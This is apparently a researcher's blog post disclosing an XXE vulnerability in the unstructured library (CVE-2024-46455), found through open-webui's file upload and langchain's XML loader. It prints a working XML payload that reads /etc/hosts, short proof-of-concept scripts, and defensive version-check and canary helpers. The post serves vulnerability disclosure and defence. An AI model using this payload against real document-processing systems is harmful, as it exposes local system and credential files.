Before proceeding, I would like to give a shoutout to my awesome friend and colleague Mohit K, who tagged along on this journey and played a pivotal role.

Summary

This blog is the result of applied vulnerability research that we did against open-webui. [ For those who don’t know, open-webui provides a web UI for Ollama AI models. ]

open-webui lets you upload files and then ask a model questions about the uploaded content. Our internal security team found the vulnerability in this feature, and at first glance we thought it was a bug in open-webui itself. It caught my interest, and on digging further we realized that we were looking at a new CVE!

Exploitation Steps

We uploaded a malicious XML payload in the open-webui chat window, and when we asked questions about the uploaded document, the response displayed the contents of a local file. My first thought was that the LLM might be hallucinating and producing a garbage response.

To confirm this, I looked through the open-webui source for the code responsible for processing uploaded documents.

The process_doc function internally calls the get_loader function to pick the appropriate loader for the document based on its content type.

[ removed the lines in between these snippets to save your eyes ]
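
As a rough illustration of this kind of content-type dispatch, here is a minimal sketch. It is not open-webui's actual code: the function names, the mapping, and the fallback behaviour are all hypothetical, and the loaders are plain stand-ins rather than langchain classes.

```python
# Hypothetical sketch of content-type based loader selection.
# None of these names are taken from open-webui's source.


def load_plain_text(path: str) -> str:
    """Fallback loader: return the file contents unchanged."""
    with open(path, encoding="utf-8") as handle:
        return handle.read()


def load_xml(path: str) -> str:
    """Stand-in for an XML-aware loader such as UnstructuredXMLLoader."""
    with open(path, encoding="utf-8") as handle:
        return handle.read()


# Assumed mapping from media type to loader function.
LOADERS_BY_CONTENT_TYPE = {
    "text/plain": load_plain_text,
    "application/xml": load_xml,
    "text/xml": load_xml,
}


def pick_loader(content_type: str):
    """Choose a loader from the upload's content type."""
    # Drop parameters such as "; charset=utf-8" and normalise the case.
    media_type = content_type.split(";", 1)[0].strip().lower()
    # Unknown types fall back to the plain-text loader in this sketch.
    return LOADERS_BY_CONTENT_TYPE.get(media_type, load_plain_text)
```

The point of the sketch is that the uploaded file's content type decides which parser touches the file, so an XML upload ends up in whatever XML parser the chosen loader uses.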

A bump on our journey

UnstructuredXMLLoader comes from the langchain library, which contains a few other loaders.

Now you may wonder what these loaders are. They are simply classes with functions that parse a document and load its contents, so that our LLMs can interpret the context and answer our questions from it.

The naming resembles Java’s interfaces and their implementations.

Just when we thought our journey had hit a wall and we were not sure what to do next, we checked whether there were any known vulnerabilities in this library. To our surprise there was one, but it was not in the function we were looking at.

We looked into this vulnerability further, and after a few hours we got to know that it is not present in the latest version of langchain. This gave us the idea of testing for it by stepping down through older versions of the langchain library.
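
To make the interface analogy concrete, here is a minimal sketch of the pattern. The class names are hypothetical and are not langchain's real classes; the only assumption carried over from langchain is that a loader exposes a load() method.

```python
from abc import ABC, abstractmethod


class DocumentLoader(ABC):
    """Hypothetical base class: the 'interface' every loader implements."""

    def __init__(self, file_path: str) -> None:
        self.file_path = file_path

    @abstractmethod
    def load(self) -> list:
        """Return the document's text as a list of chunks."""


class LineLoader(DocumentLoader):
    """Toy implementation: one chunk per non-empty line."""

    def load(self) -> list:
        with open(self.file_path, encoding="utf-8") as handle:
            return [line.strip() for line in handle if line.strip()]
```

Callers only depend on load(), so swapping in a different loader (for example an XML one) changes the parser that runs without changing the calling code.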

Finding the vulnerable version

The following image shows that langchain==0.2.14 was secure against this vulnerability,

but langchain==0.2.0, which uses unstructured==0.14.2, was vulnerable!

# vulnerable on unstructured <= 0.14.2
from langchain_community.document_loaders import UnstructuredXMLLoader

loader = UnstructuredXMLLoader("/path/to/xxe/payload.xml")
data = loader.load()
print(data)

<?xml version="1.0" ?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/hosts"> ]>
<userInfo>
 <username>&ent;</username>
</userInfo>

If you are into applied vulnerability research, you know what this means! Now that we know the vulnerable version, we have to look at the changelog to see what changed.

I’m sure that caught your eye too! The team fixed a vulnerability without publishing a security advisory, and because of this there is no record of the vulnerability anywhere on the internet.

It is quite possible that a lot of developers are still using older versions, and no SCA scanner would be able to alert them. WOW!

The pull request that fixed this issue: https://github.com/Unstructured-IO/unstructured/pull/3088/commits
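
Until scanners know about the issue, a quick manual check of the installed version can fill the gap. The sketch below relies only on the "unstructured <= 0.14.2" range stated in this post. The helper names are made up for illustration, and the version parsing is deliberately simplistic: it compares only the first three numeric components and ignores pre-release or dev suffixes.

```python
from importlib.metadata import PackageNotFoundError, version

# Per this post: unstructured <= 0.14.2 is vulnerable.
LAST_VULNERABLE = (0, 14, 2)


def parse_release(version_string: str) -> tuple:
    """Turn '0.14.2' into (0, 14, 2), ignoring any non-numeric suffix."""
    parts = []
    for piece in version_string.split(".")[:3]:
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        parts.append(int(digits or 0))
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def is_affected(version_string: str) -> bool:
    """True if the version falls in the vulnerable range from this post."""
    return parse_release(version_string) <= LAST_VULNERABLE


def installed_unstructured_status() -> str:
    """Describe the locally installed unstructured package, if any."""
    try:
        installed = version("unstructured")
    except PackageNotFoundError:
        return "unstructured is not installed"
    state = "affected" if is_affected(installed) else "not affected"
    return f"unstructured {installed}: {state}"


if __name__ == "__main__":
    print(installed_unstructured_status())
```

For anything beyond a quick check, a proper version parser (such as the one in the packaging library) would be a safer choice than this hand-rolled comparison.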

Proof of Concept

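# vulnerable on unstructured <= 0.14.2
from unstructured.partition.xml import partition_xml

# payload.xml is the XXE document shown earlier
data = partition_xml(filename="./payload.xml")
# On a vulnerable version, the element text includes the contents of /etc/hosts
print([x.text for x in data])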
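
When reproducing this in a lab, it can be cleaner to point the entity at a harmless canary file with a known marker instead of a real system file. The helper below is a hypothetical sketch using only the standard library: the function name, file names, and marker string are all made up for illustration. It writes the canary and a payload with the same shape as the one above.

```python
from pathlib import Path

# Same structure as the payload above, with the entity target left as a placeholder.
PAYLOAD_TEMPLATE = """<?xml version="1.0" ?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "{uri}"> ]>
<userInfo>
 <username>&ent;</username>
</userInfo>
"""


def write_canary_payload(workdir: str, marker: str = "XXE-CANARY-12345") -> Path:
    """Create canary.txt and payload.xml in workdir and return the payload path."""
    base = Path(workdir).resolve()
    canary = base / "canary.txt"
    canary.write_text(marker, encoding="utf-8")

    payload = base / "payload.xml"
    # as_uri() produces a file:// URI for the absolute canary path.
    payload.write_text(PAYLOAD_TEMPLATE.format(uri=canary.as_uri()), encoding="utf-8")
    return payload
```

If the marker string shows up in the text returned by partition_xml for this payload, the installed version resolved the external entity. The marker itself is never written into payload.xml, so its appearance in the output can only come from the canary file.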

Conclusion

With this, we concluded that we had re-discovered a vulnerability that was fixed without notifying the users of the package. In general, this is not considered good security practice. Users need to be told about a vulnerability even if it is fixed in the very next release; this helps them plan their updates and avoid unnecessary breaches caused by running outdated versions of the library.

I am attaching the canvas I used during this vulnerability research. I hope you find it interesting!

CVE-2024-46455 : XML eXternal Entity vulnerability in unstructured.io <= 0.14.2